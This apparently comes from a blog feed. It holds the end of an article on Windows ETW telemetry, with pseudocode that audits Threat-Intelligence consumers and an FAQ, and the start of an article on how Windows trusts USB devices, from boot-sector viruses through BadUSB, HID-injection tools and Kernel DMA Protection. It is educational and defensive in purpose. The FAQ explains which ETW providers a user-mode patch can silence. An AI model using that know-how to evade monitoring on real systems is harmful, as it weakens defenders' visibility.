// 1. Enumerate registered providers and find Microsoft-Windows-Threat-Intelligence. const providers = enumerateRegisteredProviders(); const tiProvider = providers.find(p => p.guid === "{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}"); if (!tiProvider) { warn("EtwTi provider not registered on this host"); }

// 2. Enumerate live trace sessions and find any that subscribe to TI. const sessions = enumerateLoggerSessions(); // logman query -ets equivalent const tiSessions = sessions.filter(s => s.providers.some(p => p.guid === tiProvider?.guid));

// 3. Walk EtwConsumer handles for each TI session; identify the consuming processes. const expectedConsumers = ["MsMpEng.exe", "CSFalconService.exe", "SentinelAgent.exe"]; for (const session of tiSessions) { const consumers = enumerateEtwConsumers(session.loggerId); // Shafir WinDbg JS for (const consumer of consumers) { if (!expectedConsumers.includes(consumer.processName)) { alert(`Unexpected EtwTi consumer: ${consumer.processName} (PID ${consumer.pid})`); } } }

// 4. Audit autologger persistence entries against a known baseline. const baseline = loadAutologgerBaseline(); const live = enumerateAutologgerSubkeys(); // HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger for (const entry of live) { if (!baseline.includes(entry.name)) { alert(`Unexpected autologger entry: ${entry.name}`); } } `}

With those five checks, the catalogue is no longer an abstraction. You have an inventory of what your host emits, an inventory of who consumes the most security-critical provider, an audit of the persistence surface that defines what gets emitted at all, a confirmation of the integrity layer that closes BYOVD, and a hunt for anyone who has somehow obtained the passport. Now we close with the questions every reader should expect to have.

15. Frequently asked questions

Yes, for *publication*. Sysmon's kernel driver `SysmonDrv.sys` registers `PsSetCreateProcessNotifyRoutineEx` and the related thread- and image-load callbacks; the user-mode service then publishes the resulting events via its own `Microsoft-Windows-Sysmon` ETW provider GUID `{5770385F-C22A-43E0-BF4C-06F5698FFBD9}` [@ms-sysmon]. It does not consume the public catalogue providers via ETW for its kernel-event hot path; the kernel taps come straight from the callback API. This callback-then-publish architecture is why Sysmon's events are universally consumable by SIEM forwarders and downstream tools. Because Defender consumes `Microsoft-Windows-Threat-Intelligence`, which fires from the kernel side of memory-modifying syscalls, not from the user-mode `ntdll!EtwEventWrite` trampoline. The fluxsec.red walkthrough states the asymmetry verbatim: "we cannot patch out the Threat Intelligence provider as this is emitted from within the kernel itself" [@fluxsec-eti]. The Adam Chester 2020 patch silences user-mode providers (like `Microsoft-Windows-DotNETRuntime`) for the patched process; it cannot silence kernel-emitted providers for any process. Defender's load-bearing security signal is structurally out of reach of the user-mode patch class. No. The provider's security descriptor admits only Antimalware-PPL signers loaded by an ELAM driver. A non-PPL `EnableTraceEx2` call against the EtwTi GUID returns `ERROR_ACCESS_DENIED` (the Microsoft Learn primary on EnableTraceEx2 [@ms-enabletraceex2] [@ms-enabletraceex2] documents the error code for insufficient-privilege callers; the PPL-specific gate that triggers it for EtwTi is described in [@fluxsec-eti]). The gate exists because an attacker who could trivially become an EtwTi consumer would have direct visibility into the kernel's view of every memory-modifying syscall on the host -- exactly the inventory needed to evade everything else. Schema location. Manifest-based providers ship an out-of-band XML manifest registered with `wevtutil im`; consumers decode events against the system-installed manifest using TDH. TraceLogging providers carry the schema *inline* in each event payload as type-length-value triples; consumers decode without any registered manifest. TraceLogging events are larger because the schema bytes ride in the payload; manifest events have a smaller per-event size at the cost of installation friction. Both inherit the eight-session cap [@ms-about-etw], [@ms-tracelogging-about]. Sixty-four globally per [@ms-etw-sessions], with Windows 2000 limited to 32. Per-provider, manifest-based and TraceLogging providers admit up to 8 simultaneous sessions; classic and WPP providers admit only 1 [@ms-about-etw], [@ms-etw-config]. The runtime symptom of the per-provider 8-session cap binding is `ERROR_NO_SYSTEM_RESOURCES` from `EnableTraceEx2` [@ms-enabletraceex2]; the runtime symptom of the global 64-session cap binding is the same error from `StartTrace`. No. EventPipe is a managed-runtime cross-platform analogue to ETW that shipped in .NET Core 3.0 (September 2019) and remains available in every later release including .NET 5+. It runs on Linux and macOS as well as Windows. On Windows, the kernel-mode providers and the EtwTi security substrate have no EventPipe equivalent; EventPipe is a complement to ETW for managed workloads, not a replacement. The Windows EDR substrate remains ETW; managed-runtime tracing has acquired an additional cross-platform path that does not displace it.

ETW is now twenty-six years old. It started as a performance facility for Windows 2000 driver authors who could not afford DbgPrint on production servers, and it became the substrate of every major Windows endpoint security product through a decade of unintended consequences. The Vista team that raised the per-provider session cap from 1 to 8 was thinking about ergonomics. The Windows 8.1 team that introduced Antimalware-PPL was thinking about Defender's hardening, not about future third-party EDRs. The team that shipped EtwTi in the Windows 10 RS-era understood the security stakes precisely. By 2026 those three decisions, taken in three different Microsoft contexts a decade apart, are the architecture of detection on the Windows endpoint -- and the reason the operator in the section 1 hook scene loses the round even when the patch works exactly as it should.

Plug and Trust: How Windows Decides What to Do When You Plug In a USB Device

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

Plugging a USB device into Windows is the single most-trusted action a user routinely performs on an operating system that verifies every byte of code it loads. In a few hundred milliseconds (typically 200-300 ms when the driver is already in the local store; longer on a first-time Windows Update fetch), Windows executes ten or eleven kernel-mode operations (eleven for composite devices) and trusts about 256 bytes of self-described descriptors to decide which driver runs. This article walks that pipeline end-to-end on Windows 11 25H2: the descriptor parser surface, the Plug-and-Play rank algorithm, Kernel-Mode Code Signing and Kernel DMA Protection, BadUSB and Thunderclap, and the five structural limits Windows cannot close without breaking USB compatibility.

1. The Thirty-Second Trust Decision

A user plugs a USB-C thumb drive into a Windows 11 25H2 corporate laptop at 10:42:17 in the morning. Roughly a quarter-second later, the operating system has executed ten or eleven kernel-mode operations (eleven for composite devices) to decide what kind of device it is and which driver to load.The "quarter-second" is editorial framing, not a spec-mandated deadline. The only piece USB-IF actually fixes is the 100 ms attach-debounce window T_ATTDB defined in the USB 2.0 specification §7.1.7.3 (Connect and Disconnect Signaling) [@usb-2-0-spec]; the rest of the budget is implementation-dependent. A typical USB 2.0 thumb drive on a 2024-era xHCI controller, with the function driver already in the local store, lands in the 200-300 ms range. A first-time Windows Update fetch, a slow descriptor read, or a multi-configuration device can stretch it to a second or more. None of those eleven operations consulted the user. None of them verified a cryptographic signature from the peripheral. The entire decision rests on roughly 256 bytes of self-described metadata that the device handed the host on insertion.

Here is the sequence, in the order Windows executes it:

Port-status-change interrupt fires on the xHCI host controller.
The host controller's driver issues a port reset.
Downstream-port speed detection runs: Low, Full, High, Super, or Super+ Speed.
The hub addresses the device at the default address (zero) and asks for the first eight bytes of the USB_DEVICE_DESCRIPTOR.
SET_ADDRESS assigns a non-default bus address.
The hub fetches the full eighteen-byte device descriptor.
The hub fetches the configuration descriptor, including all interface and endpoint sub-descriptors.
If the descriptor indicates a composite device, the generic parent splits it into per-interface child devices.
The Plug-and-Play manager synthesizes hardware IDs and compatible IDs from the descriptor fields.
The driver-store INF database is searched with a rank-scored matching algorithm; the chosen driver is verified against the Kernel-Mode Code Signing policy.
The class driver attaches to the new device node and begins serving I/O.

Microsoft's own architecture documentation confirms the pipeline: the xHCI host controller driver, the host-controller extension, and the hub driver -- usbhub3.sys, the binary that enumerates devices and creates physical device objects -- are all KMDF-based [@ms-usb-3-0-stack]. The rank-scored INF match comes straight from the Plug-and-Play manager's documented behavior [@ms-pnp-rank]. The signature check is governed by the same Kernel-Mode Code Signing policy that has gated every kernel driver since 64-bit Windows Vista shipped in 2007 [@ms-kmcs].

Key idea: Ten or eleven kernel-mode operations (eleven for composite devices). Zero human decisions. Roughly 256 bytes of self-described metadata. That is the size of the trust gap between physical insertion and the moment a class driver begins reading and writing data inside the Windows kernel.

The load-bearing primitive in that pipeline is the USB descriptor: a small block of bytes the peripheral emits when asked, naming what kind of device it claims to be, who claims to have made it, and what features it claims to support. Windows must trust those bytes to choose a driver. There is no out-of-band channel to verify them. There is no signature on the descriptor itself.

This article is a walk through what Windows does verify, what it cannot verify, and where the gap lives. The trust posture is older than USB itself, and the failure modes are older than Windows 2000. We will start with the inheritance.

2. The Pre-USB Removable-Media Trust Model

A user in Lahore inserts a 5.25-inch floppy into an IBM PC clone. Whatever 512 bytes sit at sector zero of that diskette will execute as part of the operating-system boot path before any code that came with the machine runs. The trust model Windows still uses for USB peripherals in 2026 was carved into silicon that year.

The IBM PC's boot ROM, by design, copied sector zero of whatever bootable medium was present into memory and jumped to it. That contract -- inserted media is trusted media -- shipped in 1981 and was demonstrated as catastrophic within five years. The Brain virus appeared in 1986 [@wiki-brain]; Stoned in 1987 [@wiki-stoned]; Michelangelo was first discovered on 3 February 1991 in Australia and produced its global panic on March 6, 1992 [@wiki-michelangelo]. Each one used the boot-sector primitive that Wikipedia's standard reference on boot sectors documents [@wiki-bootsector].The Brain virus shipped with a literal copyright notice in the boot sector, naming the Alvi brothers and giving an address in Lahore: a piece of self-documenting malware authored when virus authors did not yet expect to be prosecuted. The address-and-phone-number pattern is a recurring forensic curiosity from the 1986-1990 era.

A USB descriptor is a small, structured block of bytes that a USB peripheral returns when the host asks for it. There are five standard descriptor types in the USB 1.0 specification (device, configuration, string, interface, endpoint) and several class-specific descriptors (HID report descriptors, audio control units, mass-storage CSW formats) layered on top. The device descriptor names a vendor ID, a product ID, a device class, and the maximum packet size for the default control pipe. The string descriptors carry the human-readable manufacturer, product, and serial-number text that Windows displays in Device Manager and that Defender for Endpoint per-serial allow-lists key on. The host has no out-of-band channel to verify any of these fields; the peripheral's self-declaration *is* its identity for the purpose of driver selection.

Microsoft inherited the contract from DOS and refined it. AutoRun, which the Wikipedia reference documents verbatim, "was introduced in Windows 95 to ease application installation for non-technical users and reduce the cost of software support calls ... a feature of Windows Explorer (actually of the shell32 dll) ... enables media and devices to launch programs by use of command listed in a file called autorun.inf, stored in the root directory of the medium" [@wiki-autorun]. Windows 95 RTMed on August 24, 1995. The original design intent was CD-ROM application installation -- read-only optical media, written once at the factory, shipped in a sealed jewel case. The trust assumption matched the physical reality.

Four months after Windows 95 shipped, the USB Implementers Forum was formed. Wikipedia preserves the date and the founder list verbatim: "The USB-IF was initiated on December 5, 1995, by the group of companies that was developing USB ... Compaq, Digital Equipment Corporation, IBM, Intel, Microsoft, NEC and Nortel" [@wiki-usbif]. Microsoft was a co-author of the contract that would govern peripheral trust on every Windows machine for the next thirty years.

A Vendor ID is a 16-bit number that the USB Implementers Forum sells to a device manufacturer for a one-time \$6,000 fee [@wiki-usbif]. A Product ID is a 16-bit number the manufacturer assigns to a specific product within their VID space. The pair forms the most-specific hardware ID Windows uses to select a USB driver, in the form `USB\VID_xxxx&PID_xxxx`. The USB-IF Vendor-ID fee is the only economic gate between an arbitrary firmware author and a "trusted" identity in Windows's driver-store search; it is not a cryptographic gate of any kind.

The first complete USB specification followed quickly. Wikipedia's USB article puts it verbatim: "Designed January 1996 ... Produced Since May 1996 ... Designer: Compaq, DEC, IBM, Intel, Microsoft, NEC, Nortel" [@wiki-usb]. USB 1.0 defined the five standard descriptors, the bus enumeration handshake, and -- the load-bearing architectural choice -- the device-class architecture in which the peripheral declares its own class, subclass, and protocol. A USB keyboard reports bInterfaceClass=0x03 (HID) because it says it is a keyboard. The host has no other source of that fact.

Three years later, the protocol's storage cousin arrived. The USB Mass Storage Class Bulk-Only Transport, Revision 1.0, was published in September 1999 [@usb-massbulk-pdf]. That specification is the protocol on which Windows 2000's usbstor.sys and every modern thumb-drive driver are built. It defines a stripped-down SCSI command set tunneled over USB bulk endpoints; it does not define any peripheral-authentication mechanism.

The inheritance is structural. AutoRun shipped in 1995, designed for write-once optical media in a sealed jewel case. Windows 2000 extended AutoRun to every mounted volume -- including the new USB thumb-drive class. A 1995 trust model for trusted physical media now protected read-write USB sticks anyone could carry between machines. Forty years later, that line in the lineage has not been redrawn.

timeline title Pre-USB removable-media trust, 1981 to 2000 1981 : IBM PC ships : Boot ROM jumps to sector 0 of inserted media 1986 : Brain virus : Lahore : First in-the-wild boot-sector virus 1987 : Stoned virus : Boot-sector class established 1991 : Michelangelo discovered : 3 February 1991, Australia 1992 : Michelangelo media panic : Trigger date 6 March 1992 1995 : Windows 95 RTM : AutoRun introduced for CD-ROM installers 1995 : USB-IF founded December 5 : Seven-company consortium 1996 : USB 1.0 designed January : Device-class architecture: peripheral declares its own class 1999 : USB Mass Storage 1.0 : Bulk-Only Transport specification 2000 : Windows 2000 usbstor.sys : AutoRun extends to USB volumes

Timeline sources, in row order: [@wiki-bootsector] for the IBM PC boot-sector contract; [@wiki-brain], [@wiki-stoned], and [@wiki-michelangelo] for the named-virus lineage and the 1992-not-1991 Michelangelo panic date; [@wiki-autorun] for the Windows 95 / AutoRun introduction; [@wiki-usbif] for the USB-IF founding date and seven-company consortium; [@wiki-usb] for the USB 1.0 January 1996 design date and the device-class architecture; [@usb-massbulk-pdf] for the USB Mass Storage Class Bulk-Only Transport 1.0 specification.

If the trust model is forty years old, the failure modes must be older than USB. They are. The first fifteen years of USB on Windows were a transport in search of a security model, and the bill came due in two famous worms.

3. The Pre-Hardening Era, 1996 to 2010

For its first fifteen years on Windows, USB was a transport in search of a security model. Drivers were unsigned on 32-bit. AutoRun was on. Descriptors were trusted. The bill was paid in two worms.

The Generation-1 stack was a USB 1.1 design retrofitted onto Windows 95 OSR2.1 in 1997 and refined for Windows 2000. The host-controller drivers (Usbuhci.sys, Usbohci.sys, and later Usbehci.sys for USB 2.0 high speed) sat below a single port driver, Usbport.sys; the hub driver was usbhub.sys. Microsoft's USB-3.0 architecture page documents the older 2.0 stack as the predecessor of the modern KMDF chain [@ms-usb-3-0-stack]. On 32-bit Windows, none of these binaries needed a Microsoft-trusted signature to load.

Windows 2000 added usbstor.sys, the function driver implementing the USB Mass Storage Class Bulk-Only protocol [@usb-massbulk-pdf]. Suddenly a thumb drive was a first-class read-write filesystem the user could carry between machines, and AutoRun -- a 1995 contract for CD-ROM application installers -- applied to it.The original autorun.inf was a sensible primitive. Insert a sealed jewel case, run the vendor's setup wizard, get a new application. Extending the contract to user-writable USB sticks broke the cardinal assumption: that the media's content was set by a trustworthy party at the factory and could not be modified in the field.

KMCS is the Windows policy that requires every kernel-mode binary -- every `.sys` file Windows loads into ring zero -- to carry a digital signature chaining to a Microsoft-trusted root certificate. KMCS has been mandatory on 64-bit Windows since Vista shipped in 2007. Microsoft Learn documents the signing-by-version matrix, the SHA-256 algorithm requirement, and the post-2016 narrowing of the cross-signed-CA exception. KMCS prevents an attacker from loading an arbitrary `.sys` file into the kernel. It does not, by itself, prevent an attacker from feeding malicious *data* to an already-signed `.sys` file.

The Conficker worm, first detected in November 2008, industrialized the AutoRun-on-USB era. Wikipedia summarizes its origin verbatim: "first detected in November 2008 ... uses flaws in Windows OS software (MS08-067 / CVE-2008-4250) and dictionary attacks on administrator passwords to propagate ... The first variant of Conficker, discovered in early November 2008, propagated through the Internet by exploiting a vulnerability in a network service (MS08-067)" [@wiki-conficker]. Conficker rode two completely separate vectors: a Server Service vulnerability (a path-canonicalization overflow in srvsvc.dll reachable over SMB on TCP 445 and via NetBIOS over TCP/IP on TCP 139) over the network [@nvd-cve-2008-4250], and autorun.inf-driven AutoPlay execution on inserted USB drives. The two propagation paths are independent and worth distinguishing.

Note: MS08-067 / CVE-2008-4250 is the Server Service RPC-over-SMB vulnerability (reachable on TCP 445 and via NetBIOS over TCP/IP on TCP 139) that gave Conficker its network propagation. NIST's NVD entry characterises the surface verbatim as "a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka 'Server Service Vulnerability'" [@nvd-cve-2008-4250]. The USB-side propagation came from autorun.inf on inserted thumb drives, not from MS08-067. The two vectors share a worm but not a vulnerability. Press accounts that conflate them tend to overstate what closing MS08-067 actually did to USB-borne malware in 2008.

Stuxnet followed in 2010. Wikipedia's article puts the timing and the vector verbatim: "Stuxnet is a malicious computer worm first uncovered on 17 June 2010 ... It is typically introduced to the target environment via an infected USB flash drive, thus crossing any air gap" [@wiki-stuxnet]. The technical primitive that let Stuxnet cross air gaps onto Iranian centrifuge-control PCs was CVE-2010-2568, a flaw in the Windows Shell's processing of .LNK shortcut icons. NIST's National Vulnerability Database entry preserves the verbatim characterization: "Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems" [@nvd-cve-2010-2568]. Microsoft Security Bulletin MS10-046 shipped the patch [@ms10-046].

Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010. -- NIST, National Vulnerability Database, CVE-2010-2568 [@nvd-cve-2010-2568]

Patch Tuesday, February 2011 closed the AutoRun pipeline outside Windows 7. Brian Krebs covered the rollout verbatim at the time: "Microsoft also issued an update that changes the default behavior in Windows when users insert a removable storage device, such as a USB or thumb drive. This update effectively disables 'autorun,' a feature of Windows that has been a major vector for malware over the years. Microsoft released this same update in February 2009, but it offered it as an optional patch. The only thing different about the update this time is that it is being offered automatically to users who patch through Windows Update or Automatic Update" [@krebs-feb2011]. The update originally shipped as an optional Windows-7-era fix; Microsoft made it automatic for XP, Vista, Server 2003, and Server 2008 in February 2011.

Six months later, the descriptor-parser surface itself was named for the first time. Andy Davis of NCC Group gave "USB -- Undermining Security Barriers" at Black Hat USA 2011. The verified NCC Group publication archive carries the talk and a one-line abstract [@ncc-davis-2011]. Davis fuzzed USB descriptors against the Windows kernel parser and demonstrated that the parser itself -- not the application layer, not AutoRun -- was kernel-mode adversarial-input attack surface. The talk did not name a single bug class; it named the class of bugs: anything that parses adversarial bytes in ring zero in a memory-unsafe language.

Why did none of these fixes survive structurally? Each was a single-bug closure. Disabling AutoRun did nothing about HID injection. Patching the LNK parser did nothing about the descriptor-parser surface. Signing kernel binaries did not change what those binaries trusted at runtime. Each fix shrank one bug class by one. The premise -- that a USB peripheral's self-declaration is its identity -- was untouched.

The post-2010 hardening of USB on Windows would change the surfaces around the descriptor parser. None of it would change the descriptor parser's contract.

4. Generation by Generation: Ten Acts of Hardening

The post-2010 hardening of USB on Windows is a ten-act story: signing, lockdown, watershed, silicon, policy. Each act addressed one premise, and exactly one premise, of the trust failure that came before it. None of them changed the foundational contract.

Generation 2 -- Vista x64 Kernel-Mode Code Signing (2007). Every USB function and class driver had to chain to a Microsoft-trusted root and use SHA-2 once 64-bit Vista landed. Microsoft Learn carries the signing-by-version matrix and the cross-signed-CA carve-out verbatim, including the post-2015 narrowing in which "Cross-signed drivers are still permitted if ... The PC was upgraded from an earlier release of Windows to Windows 10, version 1607 ... Drivers was signed with an end-entity certificate issued prior to July 29th 2015 that chains to a supported cross-signed CA" [@ms-kmcs]. Companion documentation describes the broader driver-signing pipeline [@ms-drvsigning]. For the full reinvention of code-identity verification on Windows, the sibling article on Windows app identity is the canonical reference [@paragmali-appid].

Generation 3 -- AutoRun and LNK lockdown (2009-2011). Already covered in Section 3. KB971029 and MS10-046, taken together, closed the autorun.inf-driven AutoPlay vector and the LNK-icon parsing flaw used by Stuxnet [@krebs-feb2011] [@nvd-cve-2010-2568].

Generation 4 -- The descriptor-parser surface and the USB 3.0 stack (2011-2012). Andy Davis named the surface at Black Hat 2011 [@ncc-davis-2011]. Windows 8 in 2012 shipped a new USB 3.0 stack written from scratch on Microsoft's Kernel-Mode Driver Framework. The architectural reference confirms the rebuild verbatim: "Microsoft created the USB 3.0 drivers by using Kernel Mode Driver Framework (KMDF) interfaces ... Usbhub3.sys ... Manages USB hubs and their ports ... Enumerates devices and other hubs ... Creates physical device objects (PDOs)" [@ms-usb-3-0-stack]. The new stack changed the codebase the descriptor parser ran in. It did not change the contract the descriptor parser had to honor.

The Human Interface Device class is a USB device-class specification originally designed for keyboards, mice, joysticks, and similar input devices. A USB device declares itself HID by setting `bInterfaceClass=0x03` in its interface descriptor. Once Windows accepts that declaration, the device is allowed to inject keyboard and pointer events into the active session as if a human were operating a physical keyboard. The HID class has no provision for authenticating that the device is, in fact, a keyboard rather than a reprogrammed thumb drive emulating one; the class definition is itself the attack surface.

Generation 5 -- BadUSB watershed (Black Hat USA 2014). Karsten Nohl, Sascha Krißler, and Jakob Lell of SR Labs presented BadUSB -- On Accessories That Turn Evil [@nohl-wiki]. The SR Labs slide deck's title page is preserved verbatim, with all three authors named, on a mirrored PDF [@srlabs-badusb-pdf]; Wikipedia's BadUSB article also preserves the three-author attribution and the underlying primitive: "USB flash drives can contain a programmable Intel 8051 microcontroller" [@wiki-badusb].Wired's contemporaneous press coverage credited only Nohl and Lell; Krißler's name was dropped in the popular write-up. The SR Labs slide deck and the Wikipedia article both preserve the full three-author attribution. Press attributions of conference talks routinely shed authors; the slide-deck title page is the durable source. Two months after Black Hat, Adam Caudill and Brandon Wilson released the Psychson toolchain at DerbyCon 2014, demonstrating end-to-end reflash of the Phison PS2251-03 controller. The repository README confirms the lineage verbatim: "this is 8051 custom firmware written in C ... firmware patches have only been tested against PS2251-03 firmware version 1.03.53 ... DriveCom ... EmbedPayload ... Injector ... Huge thanks to the Hak5 team for their work on the excellent USB Rubber Ducky" [@psychson-repo]. Wired's October 2014 follow-up carries Caudill's verbatim release rationale from the DerbyCon stage: "The belief we have is that all of this should be public. It shouldn't be held back. So we're releasing everything we've got" [@wired-2014-10]. The same article quotes Nohl's verbatim architectural verdict on the underlying protocol: "to prevent USB devices' firmware from being rewritten, their security architecture would need to be fundamentally redesigned ... it could take 10 years or more to iron out the USB standard's bugs and pull existing vulnerable devices out of circulation" [@wired-2014-10].

It could take 10 years or more to iron out the USB standard's bugs and pull existing vulnerable devices out of circulation. -- Karsten Nohl, SR Labs, quoted in Wired, October 2014 [@wired-2014-10]

Generation 6 -- HID-as-weapon era (2010-present). The Hak5 USB Rubber Ducky -- introduced in 2010 by Hak5 founder Darren Kitchen, who pioneered the keystroke-injection technique [@hak5-ducky-docs] -- commercialized the HID-injection primitive four years before BadUSB was disclosed. The Mark II hardware is still sold today [@hak5-shop-ducky], and DuckyScript v1 (2011) and v3 (2022) are documented end-to-end on the Hak5 documentation portal [@hak5-ducky-docs].The commercial HID-injection device predates the academic disclosure by four years. By the time BadUSB hit Black Hat in August 2014, Hak5 had already been selling a packaged keystroke-injection thumb drive at consumer prices for four years. "BadUSB" academicized what penetration testers were already shipping in mailers. The O.MG Cable, released by Mischief Gadgets, embedded the implant inside a USB-A-to-Lightning charging cable form factor and put a WiFi beacon inside it. The product page states the design intent verbatim: "O.MG Cables are hand made USB cables with an advance WiFi implant inside. Designed to allow Red Teams to emulate sophisticated attack scenarios previously only capable with $20,000 cables" [@omg-cable]. The FBI's March 2020 FLASH alert -- reported by BleepingComputer at the time -- confirmed organized cybercriminal actors mailing the same primitive: "Hackers from the FIN7 cybercriminal group have been targeting various businesses with malicious USB devices acting as a keyboard when plugged into a computer ... These USB drives are configured to emulate keystrokes that launch a PowerShell command to retrieve malware from server controlled by the attacker" [@bleeping-fin7]. The FBI repeated the warning with a follow-on FLASH alert in January 2022 that extended the targeting to transportation, insurance, and defense companies [@wiki-badusb].

Generation 7 -- Thunderbolt DMA and Thunderclap (NDSS 2019), Thunderspy (2020). Theodore Markettos, Colin Rothwell, Brett Gutstein, Allison Pearce, Peter Neumann, Simon Moore, and Robert Watson of Cambridge, Rice, and SRI demonstrated peripheral DMA attacks against IOMMU-on platforms via shared-IOMMU-context attacks. Their NDSS 2019 paper concludes verbatim: "Windows only uses the IOMMU in limited cases and remains vulnerable" [@ndss-thunderclap]. One year later, Björn Ruytenberg of Eindhoven University released Thunderspy, a family of seven vulnerabilities extending the attack surface to firmware-reflash of the Thunderbolt controller itself: "All the attacker needs is 5 minutes alone with the computer, a screwdriver, and some easily portable hardware" [@thunderspy]. Wikipedia preserves the May 10, 2020 disclosure date [@thunderspy-wiki].

Generation 8 -- Kernel DMA Protection (Windows 10 1803, April 2018). This is the first Windows USB-adjacent defense that targeted trust below the descriptor parser rather than the parser itself. Microsoft Learn names the primitive verbatim: "Windows uses the system Input/Output Memory Management Unit (IOMMU) to block external peripherals from starting and performing DMA, unless the drivers for these peripherals support memory isolation (such as DMA-remapping) ... By default, peripherals with DMA Remapping incompatible drivers are blocked from starting and performing DMA until an authorized user signs into the system or unlocks the screen" [@ms-kdp]. Per-driver opt-in is documented separately [@ms-dmaremap]. The same Microsoft Learn page is explicit about what KDP does not defend: "Kernel DMA Protection feature doesn't protect against DMA attacks via 1394/FireWire, PCMCIA, CardBus, or ExpressCard". A USB 2.0 thumb drive performs no DMA at all; KDP is silent on it.

Kernel DMA Protection is the Windows defense that uses the platform's IOMMU (Intel VT-d, AMD-Vi, or an ARM equivalent) to confine externally connected PCIe-class peripherals to device-private memory windows. With KDP armed, a Thunderbolt or USB4 peripheral cannot read arbitrary kernel memory by issuing DMA requests, even if its driver is malicious or buggy. KDP is opt-in at three levels: silicon (the platform must have an IOMMU), firmware (the UEFI must publish DMAR / IVRS tables), and driver (the driver must declare `DmaRemappingCompatible=1` in its INF). KDP does not protect against attacks delivered through descriptor parsing, HID injection, or mass-storage exfiltration.

Generation 9 -- USB Type-C UCM stack (Windows 10 1607, 2016). The User-mode Connector Manager class extension family -- UcmCx.sys, UcmUcsiCx.sys, UcmTcpciCx.sys -- brought Power Delivery, Alternate Mode (DisplayPort, Thunderbolt, USB4), and bidirectional power-role negotiation into the Windows driver model. Microsoft Learn names the architecture verbatim: "UCM is designed by using the WDF class extension-client driver model" [@ms-typec].

Generation 10 -- Defender, ASR, and Device Control unification (2018-2024). The Attack Surface Reduction rule set, documented in Microsoft's ASR-rule-to-GUID matrix [@ms-asr-rules], includes the rule Block untrusted and unsigned processes that run from USB with GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4. Microsoft Defender for Endpoint Device Control followed, generally available in 2024, with per-VID/PID, per-serial-number, per-operation, and per-user policy primitives [@ms-devcontrol]. Together with the older Group Policy Device Installation Restrictions framework [@ms-gpo-devinstall] and the system-defined Device Setup Class GUIDs [@ms-devsetupclasses], these form the deployable enterprise triangle around the BadUSB / HID-injection problem.

timeline title Ten generations of Windows USB hardening 1996 : Gen 1 : Original USB stack ships ; unsigned 32-bit drivers 2007 : Gen 2 : KMCS on Vista x64 ; mandatory signed kernel binaries 2009-2011 : Gen 3 : AutoRun and LNK lockdown ; KB971029 and MS10-046 2011 : Gen 4 : Andy Davis names the descriptor parser surface 2012 : Gen 4 cont. : USB 3.0 KMDF stack ships in Windows 8 2014 : Gen 5 : BadUSB watershed ; SR Labs at Black Hat 2010-2024 : Gen 6 : HID-as-weapon era ; Rubber Ducky to O.MG Cable 2019-2020 : Gen 7 : Thunderclap and Thunderspy ; IOMMU is not enough 2018 : Gen 8 : Kernel DMA Protection ; Windows 10 1803 2016 : Gen 9 : USB Type-C UCM stack ; Windows 10 1607 2018-2024 : Gen 10 : ASR, Device Control, GPO triangle ; Defender for Endpoint

Sources, in row order: [@ms-usb-3-0-stack] for the USB 2.0 stack and the USB 3.0 KMDF rewrite; [@ms-kmcs] for the Vista x64 signing transition; [@krebs-feb2011] and [@nvd-cve-2010-2568] for the AutoRun-and-LNK lockdown; [@ncc-davis-2011] for the Andy Davis Black Hat 2011 talk; [@srlabs-badusb-pdf] and [@wiki-badusb] for the BadUSB three-author SR Labs disclosure; [@hak5-shop-ducky], [@hak5-ducky-docs], [@omg-cable], and [@bleeping-fin7] for the HID-as-weapon lineage; [@ndss-thunderclap] and [@thunderspy] for the IOMMU attack family; [@ms-kdp] and [@ms-dmaremap] for Kernel DMA Protection; [@ms-typec] for the Type-C UCM stack; [@ms-asr-rules], [@ms-devcontrol], [@ms-gpo-devinstall], and [@ms-devsetupclasses] for the modern enterprise policy triangle.

Note: Ten generations of Windows USB hardening. Signing on top, IOMMU underneath, policy frameworks around the edges. Every one of them addressed a surface adjacent to the descriptor parser. None addressed the contract the descriptor parser has to honor: that the peripheral's self-declared identity is the only identity the host gets. Until USB-IF Authentication 1.0 ships in commodity silicon, that contract is going to outlast every defense in this section.

Ten generations of hardening, each closing a single attack surface, each leaving the descriptor-trust contract intact. The single defense that should close it -- USB-IF Authentication 1.0, published January 2019 -- is the next section's reckoning.

5. The Modern USB Stack as a Multi-Stage Verifier

We have walked forty years of inheritance and ten generations of layered hardening. Now we are going to do the thing the rest of this article rests on: walk a single USB device, from the millisecond it makes electrical contact to the moment a class driver attaches to it, through the nine stages Windows 11 25H2 actually executes -- by named binary, by descriptor, by trust decision.

Those nine stages are a reorganisation of §1's eleven kernel-mode operations, not a different list. §1's three physical-detection operations -- port-status interrupt, port reset, speed detection -- fuse into Stage 1; §1's three default-address descriptor operations (initial 8-byte fetch, SET_ADDRESS, full 18-byte fetch) fuse into Stage 2; §1's combined INF-search-and-KMCS operation splits into Stages 6 and 7; and a new Stage 9 covers the IOMMU enforcement Kernel DMA Protection performs after the class driver attaches. The arithmetic is eleven minus two minus two plus one plus one equals nine. The StudyGuide question 1 at the foot of this article retains the §1 framing for exam purposes; the per-stage walk below uses the §5 reorganisation.

